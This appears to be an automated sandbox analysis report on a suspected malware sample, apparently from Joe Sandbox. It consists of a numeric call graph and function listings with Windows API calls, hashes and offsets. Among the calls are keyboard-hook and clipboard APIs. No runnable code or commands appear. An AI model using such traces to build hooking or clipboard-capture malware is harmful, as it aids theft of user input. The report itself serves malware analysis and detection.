42101 5451049 42099->42101 42100 5451064 42101->42100 42105 5451080 42101->42105 42117 5451090 42101->42117 42102 5451079 42106 5451084 42105->42106 42107 54510bd 42106->42107 42108 5451101 42106->42108 42115 5451080 3 API calls 42107->42115 42116 5451090 3 API calls 42107->42116 42109 545117d 42108->42109 42111 54510c3 42108->42111 42129 5451230 42108->42129 42109->42111 42135 5451670 42109->42135 42139 5451660 42109->42139 42110 545119f 42110->42102 42111->42102 42115->42111 42116->42111 42118 5451091 42117->42118 42119 54510bd 42118->42119 42120 5451101 42118->42120 42127 5451080 3 API calls 42119->42127 42128 5451090 3 API calls 42119->42128 42121 545117d 42120->42121 42123 54510c3 42120->42123 42124 5451230 2 API calls 42120->42124 42121->42123 42125 5451660 OleGetClipboard 42121->42125 42126 5451670 OleGetClipboard 42121->42126 42122 545119f 42122->42102 42123->42102 42124->42121 42125->42122 42126->42122 42127->42123 42128->42123 42130 5451248 42129->42130 42143 543c547 42130->42143 42151 543a9e8 42130->42151 42155 543a9f4 42130->42155 42131 5451251 42131->42109 42137 5451685 42135->42137 42138 54516ab 42137->42138 42162 545074c 42137->42162 42138->42110 42141 5451664 42139->42141 42140 545074c OleGetClipboard 42140->42141 42141->42140 42142 54516ab 42141->42142 42142->42110 42144 543c56f 42143->42144 42145 543c6ce OleInitialize 42144->42145 42148 543c662 42144->42148 42149 543c619 42144->42149 42146 543c71c 42145->42146 42146->42131 42147 543c683 42147->42131 42148->42147 42159 543aa10 42148->42159 42149->42131 42152 543a9ed 42151->42152 42153 543aa10 OleInitialize 42152->42153 42154 543c683 42152->42154 42153->42154 42154->42131 42156 543a9ff 42155->42156 42157 543c683 42156->42157 42158 543aa10 OleInitialize 42156->42158 42157->42131 42158->42157 42160 543c6b8 OleInitialize 42159->42160 42161 543c71c 42160->42161 42161->42147 42163 5451718 OleGetClipboard 42162->42163 42165 54517b2 42163->42165 42166 11de890 42168 11de89d 42166->42168 42167 11de8d6 42168->42167 42170 11dc020 42168->42170 42172 11dc02b 42170->42172 42171 11dea20 42172->42171 42174 11dc030 42172->42174 42175 11dc03b 42174->42175 42183 11d6e14 42175->42183 42177 11dea8f 42187 11df240 42177->42187 42178 11dea9e 42180 54323b0 10 API calls 42178->42180 42181 543239f 10 API calls 42178->42181 42179 11deac9 42179->42171 42180->42179 42181->42179 42184 11d6e1a 42183->42184 42185 11da573 42184->42185 42191 11de8f8 42184->42191 42185->42177 42188 11df26e 42187->42188 42189 11df33a KiUserCallbackDispatcher 42188->42189 42190 11df33f 42188->42190 42189->42190 42192 11de904 42191->42192 42202 54341f0 42192->42202 42207 5434327 42192->42207 42211 5434200 42192->42211 42215 5434347 42192->42215 42193 11de946 42194 11de96f 42193->42194 42219 543e7d0 42193->42219 42236 543e7c3 42193->42236 42253 543e780 42193->42253 42194->42185 42203 54341e9 42202->42203 42204 54341fa 42202->42204 42203->42193 42205 5434450 42204->42205 42270 5435990 42204->42270 42205->42193 42208 543432f 42207->42208 42209 5434450 42208->42209 42210 5435990 10 API calls 42208->42210 42209->42193 42210->42209 42212 5434215 42211->42212 42213 5434450 42212->42213 42214 5435990 10 API calls 42212->42214 42213->42193 42214->42213 42216 5434359 42215->42216 42217 5434450 42216->42217 42218 5435990 10 API calls 42216->42218 42217->42193 42218->42217 42220 543e7f9 42219->42220 42221 543eacc 42220->42221 42222 54385c0 10 API calls 42220->42222 42234 543e99a 42220->42234 42235 543e871 42220->42235 42224 54385c0 10 API calls 42221->42224 42221->42234 42223 543ea94 42222->42223 42223->42221 42225 543ea9d 42223->42225 42226 543eb03 42224->42226 42227 543eab5 42225->42227 42225->42234 42233 543c070 2 API calls 42226->42233 42226->42234 42231 543c070 2 API calls 42227->42231 42228 543ed33 42232 54385c0 10 API calls 42228->42232 42229 543ed52 42230 54385c0 10 API calls 42229->42230 42230->42235 42231->42235 42232->42235 42233->42234 42234->42228 42234->42229 42234->42235 42235->42194 42237 543e7d0 42236->42237 42238 543eacc 42237->42238 42239 54385c0 10 API calls 42237->42239 42251 543e99a 42237->42251 42252 543e871 42237->42252 42241 54385c0 10 API calls 42238->42241 42238->42251 42240 543ea94 42239->42240 42240->42238 42242 543ea9d 42240->42242 42243 543eb03 42241->42243 42244 543eab5 42242->42244 42242->42251 42250 543c070 2 API calls 42243->42250 42243->42251 42248 543c070 2 API calls 42244->42248 42245 543ed33 42249 54385c0 10 API calls 42245->42249 42246 543ed52 42247 54385c0 10 API calls 42246->42247 42247->42252 42248->42252 42249->42252 42250->42251 42251->42245 42251->42246 42251->42252 42252->42194 42254 543e784 42253->42254 42255 543eacc 42254->42255 42256 54385c0 10 API calls 42254->42256 42268 543e99a 42254->42268 42269 543e78b 42254->42269 42258 54385c0 10 API calls 42255->42258 42255->42268 42257 543ea94 42256->42257 42257->42255 42259 543ea9d 42257->42259 42260 543eb03 42258->42260 42261 543eab5 42259->42261 42259->42268 42267 543c070 2 API calls 42260->42267 42260->42268 42265 543c070 2 API calls 42261->42265 42262 543ed33 42266 54385c0 10 API calls 42262->42266 42263 543ed52 42264 54385c0 10 API calls 42263->42264 42264->42269 42265->42269 42266->42269 42267->42268 42268->42262 42268->42263 42268->42269 42269->42194 42271 54359b9 42270->42271 42276 5435a11 42271->42276 42286 54385c0 42271->42286 42294 543850e 42271->42294 42272 5435aa9 42273 5435ab2 42272->42273 42272->42276 42275 5435a1e 42273->42275 42302 543c01b 42273->42302 42307 543c028 42273->42307 42312 543c061 42273->42312 42316 543c070 42273->42316 42275->42205 42276->42275 42320 54332b0 42276->42320 42277 5435f0e 42278 5435ce1 42278->42277 42327 54358b0 42278->42327 42287 54385c1 42286->42287 42288 5438708 42287->42288 42289 543861f 42287->42289 42330 543b848 42287->42330 42288->42289 42290 543e7c3 10 API calls 42288->42290 42291 543e7d0 10 API calls 42288->42291 42292 543e780 10 API calls 42288->42292 42289->42272 42290->42289 42291->42289 42292->42289 42295 5438523 42294->42295 42296 543861f 42295->42296 42297 5438708 42295->42297 42301 543b848 10 API calls 42295->42301 42296->42272 42297->42296 42298 543e7c3 10 API calls 42297->42298 42299 543e7d0 10 API calls 42297->42299 42300 543e780 10 API calls 42297->42300 42298->42296 42299->42296 42300->42296 42301->42297 42303 543c026 42302->42303 42303->42275 42304 543c053 42303->42304 42306 543c547 2 API calls 42303->42306 42304->42275 42305 543c0a9 42305->42275 42306->42305 42309 543c02a 42307->42309 42308 543c053 42308->42275 42309->42275 42309->42308 42311 543c547 2 API calls 42309->42311 42310 543c0a9 42310->42275 42311->42310 42313 543c068 42312->42313 42315 543c547 2 API calls 42313->42315 42314 543c0a9 42314->42275 42315->42314 42317 543c09a 42316->42317 42319 543c547 2 API calls 42317->42319 42318 543c0a9 42318->42275 42319->42318 42322 54332bb 42320->42322 42321 5433db3 42321->42278 42322->42321 42323 5434327 10 API calls 42322->42323 42324 5433df6 42323->42324 42325 5434347 10 API calls 42324->42325 42326 5433e16 42325->42326 42326->42278 42353 5435368 42327->42353 42332 543b84c 42330->42332 42333 543b90d 42332->42333 42334 5439060 42332->42334 42333->42288 42335 5439061 42334->42335 42336 54390ad 42335->42336 42338 5450778 42335->42338 42336->42333 42339 54507b1 42338->42339 42340 545084f 42339->42340 42348 54323b0 10 API calls 42339->42348 42349 543239f 10 API calls 42339->42349 42345 5457590 CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 42340->42345 42346 5457583 CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 42340->42346 42347 5457669 SendMessageW 42340->42347 42341 54509d7 42350 5430ed3 KiUserCallbackDispatcher 42341->42350 42351 5431028 KiUserCallbackDispatcher 42341->42351 42352 54303ac KiUserCallbackDispatcher 42341->42352 42342 54508c5 42342->42341 42343 54503d4 SendMessageW 42342->42343 42343->42341 42344 5450a38 42345->42342 42346->42342 42347->42342 42348->42340 42349->42340 42350->42344 42351->42344 42352->42344 42354 54358e0 SetWindowLongW 42353->42354 42355 54358c8 42354->42355 42355->42277 42356 545a608 42357 545a618 42356->42357 42359 54358b0 SetWindowLongW 42357->42359 42358 545a62a 42359->42358 42360 11d7690 DuplicateHandle 42361 11d7726 42360->42361 42640 545b028 42641 545b03c 42640->42641 42644 545b448 42640->42644 42648 545b458 42640->42648 42645 545b44c 42644->42645 42646 545b492 42645->42646 42647 11df240 KiUserCallbackDispatcher 42645->42647 42646->42641 42647->42646 42649 545b459 42648->42649 42650 545b492 42649->42650 42651 11df240 KiUserCallbackDispatcher 42649->42651 42650->42641 42651->42650 42652 11d1bf0 42656 11d1c80 42652->42656 42661 11d1c72 42652->42661 42653 11d1c06 42657 11d1c8f 42656->42657 42659 11d1c72 12 API calls 42656->42659 42658 11d1c9a 42657->42658 42668 11d5fa1 42657->42668 42658->42653 42659->42657 42662 11d1c7a 42661->42662 42665 11d1cdd 42661->42665 42663 11d1c8f 42662->42663 42667 11d1c72 12 API calls 42662->42667 42664 11d1c9a 42663->42664 42666 11d5fa1 12 API calls 42663->42666 42664->42653 42665->42665 42666->42664 42667->42663 42669 11d5ffb 42668->42669 42673 11d5faa 42668->42673 42676 11d578c 42669->42676 42671 11d600f 42683 545af80 42671->42683 42688 545af90 42671->42688 42673->42658 42677 11d5791 42676->42677 42693 11d57dc 42677->42693 42679 11d651d 42681 5439060 10 API calls 42679->42681 42697 543904f 42679->42697 42680 11d6527 42680->42671 42681->42680 42684 545af84 42683->42684 42709 11d9958 42684->42709 42713 11d994b 42684->42713 42689 545af91 42688->42689 42691 11d9958 2 API calls 42689->42691 42692 11d994b 2 API calls 42689->42692 42690 11d6017 42690->42658 42691->42690 42692->42690 42694 11d57e7 42693->42694 42701 11d6444 42694->42701 42696 11d69e5 42696->42679 42698 5439054 42697->42698 42699 54390ad 42698->42699 42700 5450778 10 API calls 42698->42700 42699->42680 42700->42699 42702 11d644f 42701->42702 42705 11d6dd0 42702->42705 42704 11d72ca 42704->42696 42706 11d6ddb 42705->42706 42707 11d6e14 10 API calls 42706->42707 42708 11d73d4 42707->42708 42708->42704 42710 11d9986 42709->42710 42717 11d9588 42710->42717 42712 11d99a6 42712->42712 42714 11d9986 42713->42714 42715 11d9588 2 API calls 42714->42715 42716 11d99a6 42715->42716 42716->42716 42719 11d9593 42717->42719 42718 11da837 42718->42712 42719->42718 42722 543d190 42719->42722 42726 543d008 42719->42726 42724 543d1f5 42722->42724 42723 543d242 42723->42718 42724->42723 42725 543d658 WaitMessage 42724->42725 42725->42724 42730 543d013 42726->42730 42727 543d16a 42727->42718 42728 543d658 WaitMessage 42728->42730 42729 543d242 42729->42718 42730->42727 42730->42728 42730->42729 42731 545c6ab 42732 545c6be 42731->42732 42736 545c960 42732->42736 42740 545c988 42732->42740 42733 545c6e1 42737 545c964 42736->42737 42737->42733 42738 545c989 PostMessageW 42737->42738 42739 545c9f4 42738->42739 42739->42733 42741 545c989 PostMessageW 42740->42741 42742 545c9f4 42741->42742 42742->42733 42743 6780ac8 DispatchMessageW 42744 6780b34 42743->42744 42745 5430d70 42748 5430d8c 42745->42748 42747 5430ddc 42749 5430de1 42748->42749 42750 54303ac 42748->42750 42752 54303b7 42750->42752 42751 5430f55 42751->42747 42752->42751 42753 54310d0 KiUserCallbackDispatcher 42752->42753 42753->42751 42362 545b910 42363 545b912 42362->42363 42366 5453670 42363->42366 42365 545b93c 42367 5453671 42366->42367 42368 5453682 42367->42368 42369 545367b 42367->42369 42375 5453691 42368->42375 42380 54536a0 42368->42380 42385 54529a4 CallWindowProcW CallWindowProcW CallWindowProcW 42369->42385 42371 5453688 42371->42365 42372 5453680 42372->42365 42376 54536a0 42375->42376 42377 54536bc 42376->42377 42386 54379d9 42376->42386 42391 54379e8 42376->42391 42377->42371 42381 54536a2 42380->42381 42382 54379d9 3 API calls 42381->42382 42383 54536bc 42381->42383 42384 54379e8 3 API calls 42381->42384 42382->42383 42383->42371 42384->42383 42385->42372 42388 54379e8 42386->42388 42387 5437a85 42387->42377 42388->42387 42396 5453700 42388->42396 42402 5453710 42388->42402 42393 54379ea 42391->42393 42392 5437a85 42392->42377 42393->42392 42394 5453700 3 API calls 42393->42394 42395 5453710 3 API calls 42393->42395 42394->42392 42395->42392 42397 5453704 42396->42397 42398 5453779 42397->42398 42401 54354a4 CallWindowProcW 42397->42401 42408 5438c20 42397->42408 42415 54354a2 42397->42415 42398->42387 42401->42398 42403 5453712 42402->42403 42404 5453779 42403->42404 42405 54354a2 2 API calls 42403->42405 42406 5438c20 2 API calls 42403->42406 42407 54354a4 CallWindowProcW 42403->42407 42404->42387 42405->42404 42406->42404 42407->42404 42409 5438c30 42408->42409 42410 5438c72 42409->42410 42411 5438d1c 42409->42411 42413 5438cca CallWindowProcW 42410->42413 42414 5438c79 42410->42414 42422 5435358 42411->42422 42413->42414 42414->42398 42416 5438c30 42415->42416 42417 5438c72 42416->42417 42418 5438d1c 42416->42418 42420 5438cca CallWindowProcW 42417->42420 42421 5438c79 42417->42421 42419 5435358 CallWindowProcW 42418->42419 42419->42421 42420->42421 42421->42398 42423 5435363 42422->42423 42424 54354a4 CallWindowProcW 42423->42424 42425 5436cf1 42423->42425 42424->42425 42426 11df748 42430 5430040 42426->42430 42435 5430006 42426->42435 42427 11df757 42431 5430051 42430->42431 42432 543005c 42430->42432 42440 5430633 42431->42440 42444 5430638 42431->42444 42432->42427 42436 5430040 42435->42436 42437 543005c 42436->42437 42438 5430633 GetModuleHandleW 42436->42438 42439 5430638 GetModuleHandleW 42436->42439 42437->42427 42438->42437 42439->42437 42441 5430638 GetModuleHandleW 42440->42441 42443 54306ad 42441->42443 42443->42432 42445 5430680 GetModuleHandleW 42444->42445 42446 543067a 42444->42446 42447 54306ad 42445->42447 42446->42445 42447->42432 42448 11d2a08 42450 11d2a4c SetWindowsHookExW 42448->42450 42451 11d2a92 42450->42451 42754 545a7f0 42755 545a800 42754->42755 42756 5453670 3 API calls 42755->42756 42757 545a809 42756->42757 42452 5438d98 42453 5438d99 42452->42453 42459 543aa71 42453->42459 42472 5453e78 42453->42472 42478 5453e68 42453->42478 42484 543b008 42453->42484 42454 5438dd1 42464 543aa74 42459->42464 42460 543ae1c 42460->42454 42462 5439060 10 API calls 42463 543b415 42462->42463 42463->42454 42464->42460 42471 543b26d 42464->42471 42496 543a474 42464->42496 42465 543b0ee 42466 5439060 10 API calls 42465->42466 42470 543b196 42465->42470 42467 543b160 42466->42467 42468 5439060 10 API calls 42467->42468 42468->42470 42469 5439060 10 API calls 42469->42471 42470->42469 42471->42462 42471->42463 42473 5453e79 42472->42473 42475 543aa71 10 API calls 42473->42475 42477 543b008 10 API calls 42473->42477 42502 543b2b5 42473->42502 42474 5453f02 42474->42454 42475->42474 42477->42474 42479 5453e6c 42478->42479 42481 543aa71 10 API calls 42479->42481 42482 543b2b5 10 API calls 42479->42482 42483 543b008 10 API calls 42479->42483 42480 5453f02 42480->42454 42481->42480 42482->42480 42483->42480 42489 543b009 42484->42489 42485 543a474 10 API calls 42490 543b0ee 42485->42490 42486 543b26d 42487 5439060 10 API calls 42486->42487 42488 543b415 42486->42488 42487->42488 42488->42454 42489->42485 42489->42486 42491 5439060 10 API calls 42490->42491 42493 543b196 42490->42493 42492 543b160 42491->42492 42494 5439060 10 API calls 42492->42494 42495 5439060 10 API calls 42493->42495 42494->42493 42495->42486 42498 543a47f 42496->42498 42497 5439060 10 API calls 42500 543b5a9 42497->42500 42499 5439060 10 API calls 42498->42499 42498->42500 42501 543b5e7 42498->42501 42499->42500 42500->42497 42500->42501 42501->42465 42503 543b2be 42502->42503 42505 543b2dc 42502->42505 42504 5439060 10 API calls 42503->42504 42503->42505 42504->42505 42506 5439060 10 API calls 42505->42506 42507 543b415 42505->42507 42506->42507 42507->42474 42508 5435698 42509 5435700 CreateWindowExW 42508->42509 42511 54357bc 42509->42511 42512 5452cd8 42514 5452cef 42512->42514 42513 5452ec7 42516 5452ed0 42514->42516 42517 5452ee0 42516->42517 42518 5452f03 42517->42518 42519 545308e 42517->42519 42520 5453046 42517->42520 42518->42519 42523 5453660 3 API calls 42518->42523 42524 5453670 3 API calls 42518->42524 42519->42513 42522 5453670 3 API calls 42520->42522 42525 5453660 42520->42525 42522->42519 42523->42519 42524->42519 42526 545366c 42525->42526 42527 5453682 42526->42527 42528 545367b 42526->42528 42532 5453691 3 API calls 42527->42532 42533 54536a0 3 API calls 42527->42533 42534 54529a4 CallWindowProcW CallWindowProcW CallWindowProcW 42528->42534 42530 5453688 42530->42519 42531 5453680 42531->42519 42532->42530 42533->42530 42534->42531 42758 5453c78 42759 5453670 3 API calls 42758->42759 42760 5453c86 42758->42760 42759->42760

                                                              Executed Functions

                                                              Function 0543D190 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c32813809b770fd420edbc22f343b5d42fe9e9170d52321538a930795cd26b2
                                                              • Instruction ID: eaf209d7b452e7f5581e054a492e9c08eac5fc26622dc8683c06d8a01825644c
                                                              • Opcode Fuzzy Hash: 2c32813809b770fd420edbc22f343b5d42fe9e9170d52321538a930795cd26b2
                                                              • Instruction Fuzzy Hash: BBF12B30E002098FDB14DFA9C949BAEBBF2BF48344F15856AE419AB365DB74E945CB40
                                                              Function 011D7400 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 603 11d7400-11d749f GetCurrentProcess 608 11d74a8-11d74dc GetCurrentThread 603->608 609 11d74a1-11d74a7 603->609 610 11d74de-11d74e4 608->610 611 11d74e5-11d7519 GetCurrentProcess 608->611 609->608 610->611 612 11d751b-11d7521 611->612 613 11d7522-11d753a 611->613 612->613 625 11d753d call 11d7618 613->625 626 11d753d call 11d8880 613->626 617 11d7543-11d7572 GetCurrentThreadId 618 11d757b-11d75dd 617->618 619 11d7574-11d757a 617->619 619->618 625->617 626->617
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 011D748E
                                                              • GetCurrentThread.KERNEL32 ref: 011D74CB
                                                              • GetCurrentProcess.KERNEL32 ref: 011D7508
                                                              • GetCurrentThreadId.KERNEL32 ref: 011D7561
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 36da88d9e58d636e6c7169ac5b416c4e1228bce8d30fcdbed2261d0445030817
                                                              • Instruction ID: bf5f4bce19adc129306f9005c46ac2d215bc98311fdddbfbd56c4a86d3bf603d
                                                              • Opcode Fuzzy Hash: 36da88d9e58d636e6c7169ac5b416c4e1228bce8d30fcdbed2261d0445030817
                                                              • Instruction Fuzzy Hash: CC5136B09003498FDB19DFAAD948BAEBFF5EF48314F20C459E419A73A0D7349944CB66
                                                              Function 011D7410 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 627 11d7410-11d749f GetCurrentProcess 631 11d74a8-11d74dc GetCurrentThread 627->631 632 11d74a1-11d74a7 627->632 633 11d74de-11d74e4 631->633 634 11d74e5-11d7519 GetCurrentProcess 631->634 632->631 633->634 635 11d751b-11d7521 634->635 636 11d7522-11d753a 634->636 635->636 648 11d753d call 11d7618 636->648 649 11d753d call 11d8880 636->649 640 11d7543-11d7572 GetCurrentThreadId 641 11d757b-11d75dd 640->641 642 11d7574-11d757a 640->642 642->641 648->640 649->640
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 011D748E
                                                              • GetCurrentThread.KERNEL32 ref: 011D74CB
                                                              • GetCurrentProcess.KERNEL32 ref: 011D7508
                                                              • GetCurrentThreadId.KERNEL32 ref: 011D7561
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: d13692a0395b0e179ce098d26af534839f32520346c95ea1000bf42906a52b27
                                                              • Instruction ID: b7a6e3c39c969d665d14100809c824601fe717949043c021f5efe9b7e4a3b6f5
                                                              • Opcode Fuzzy Hash: d13692a0395b0e179ce098d26af534839f32520346c95ea1000bf42906a52b27
                                                              • Instruction Fuzzy Hash: CB5148B09003498FDB19DFAADA48BAEBFF5EF48314F20C459E419A7390D7349944CB66
                                                              Function 054303AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 935 54303ac-5430f49 938 5430f4f-5430f53 935->938 939 5430fcc-5430fcf 935->939 940 5430fd0-543103e 938->940 941 5430f55-5430f6f 938->941 964 5431044-543106a call 54303dc 940->964 965 54310f8-54310fd 940->965 946 5430f83-5430fa7 call 54303cc 941->946 947 5430f71-5430f78 941->947 956 5430fac-5430fae 946->956 947->946 948 5430f7a-5430f7e call 54303bc 947->948 948->946 958 5430fb0-5430fbc 956->958 959 5430fc5 956->959 958->959 962 5430fbe 958->962 959->939 962->959 970 543107a-543107f 964->970 971 543106c-5431077 964->971 972 5431081-5431083 call 54303ec 970->972 973 5431088-5431090 970->973 971->970 972->973 975 5431092-54310ab call 54303fc 973->975 976 54310b5-54310f3 KiUserCallbackDispatcher call 543040c 973->976 975->976 976->965
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03E560D8,02E77C30,?,00000000,?,00000000,00000000), ref: 054310E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: Haq
                                                              • API String ID: 2492992576-725504367
                                                              • Opcode ID: ed8e3a2266fd546af6d711306d99f1110caf86d8b6e1d036ecdfc8547a1fa64f
                                                              • Instruction ID: 00bc01ce8b16f62b63f7ed848ffebce84cc75c37d501d64fe574055cf9c83ab1
                                                              • Opcode Fuzzy Hash: ed8e3a2266fd546af6d711306d99f1110caf86d8b6e1d036ecdfc8547a1fa64f
                                                              • Instruction Fuzzy Hash: 54519C303046118FD718EB39C459BAF77A6BF88614F1486AAE40ACB7A5CF75DD02CB94
                                                              Function 054593E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 982 54593e8-54593fa 983 5459402-545940d 982->983 984 54593fd call 5457ee4 982->984 985 5459422-5459432 983->985 986 545940f-545941f call 5458ea8 983->986 984->983 990 5459434-5459435 985->990 991 5459439-54594b4 CreateIconFromResourceEx 985->991 990->991 992 54594b6-54594bc 991->992 993 54594bd-54594da 991->993 992->993
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID: V
                                                              • API String ID: 3668623891-1342839628
                                                              • Opcode ID: 778a1ffb63c3e2b5f0d29a7c52794cd9784cd69d98b41373a2196d132a5fe70c
                                                              • Instruction ID: 3ce1f3dac798e35a46e927b69de918fbc39935024018153427647fce9393d8e6
                                                              • Opcode Fuzzy Hash: 778a1ffb63c3e2b5f0d29a7c52794cd9784cd69d98b41373a2196d132a5fe70c
                                                              • Instruction Fuzzy Hash: 13318B71904348DFCB12DFA9D804ADEBFF9FF0A320F14806AE954A7222C3359850DBA1
                                                              Function 054597A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 996 54597a8-54597aa 997 54597b1-545981a SendMessageW 996->997 998 54597ac-54597ad 996->998 999 5459823-5459837 997->999 1000 545981c-5459822 997->1000 998->997 1000->999
                                                              APIs
                                                              • SendMessageW.USER32(?,?,?,?), ref: 0545980D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: V
                                                              • API String ID: 3850602802-1342839628
                                                              • Opcode ID: 5212a44c6973ffaec73b2be3e4c47644e2b40eb3ae77334cdfebb401cee7fc1b
                                                              • Instruction ID: 4355ca05710daee399450073d17d5233164b94c050d8ab3a62a7bbb9b4173d9b
                                                              • Opcode Fuzzy Hash: 5212a44c6973ffaec73b2be3e4c47644e2b40eb3ae77334cdfebb401cee7fc1b
                                                              • Instruction Fuzzy Hash: 151106B5800349DFDB10DF9AD585BDEBBF8FB48720F20841AD918A7241D375A544CFA1
                                                              Function 0543C547 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c95e0d0eb1b47d1fae2cd56fa90d69da26a468e820df36fd9c5dd7c87bc404d
                                                              • Instruction ID: 181c34121d67d5f36a06da0f6dd976f34a56e71f78f55f32f0aea9ae9f0fbde7
                                                              • Opcode Fuzzy Hash: 4c95e0d0eb1b47d1fae2cd56fa90d69da26a468e820df36fd9c5dd7c87bc404d
                                                              • Instruction Fuzzy Hash: E351A271A006058FCB14CFADC589ADEBBF5BF88314F2484AAE415A73A1CB74EC45CB91
                                                              Function 06781F50 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600796785.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6780000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 849d390bba6d59b7f517c55b2ed54e55c1499b357356357964b04b24d3410bd7
                                                              • Instruction ID: cc6697d1c953f73a75d82c61a6cad40949f771619446278db94996a7526480ad
                                                              • Opcode Fuzzy Hash: 849d390bba6d59b7f517c55b2ed54e55c1499b357356357964b04b24d3410bd7
                                                              • Instruction Fuzzy Hash: B5412271E143499FCB04DFA9C8042EEBBF1EF89310F15856AD808A7241DB389985CBE1
                                                              Function 0543568C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054357AA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 3fb876afedb5e21b7dbd97b54b0159166556580de1e00b71abc1435240c8c187
                                                              • Instruction ID: 445348348ea1b79d1ba275da97c355d740a361ab5d54b3fd3d4f5537066de3b0
                                                              • Opcode Fuzzy Hash: 3fb876afedb5e21b7dbd97b54b0159166556580de1e00b71abc1435240c8c187
                                                              • Instruction Fuzzy Hash: 3851D0B1D10309DFDB14CFAAC985ADEBFB5BF48310F24812AE419AB250D7749985CF90
                                                              Function 05435698 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054357AA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
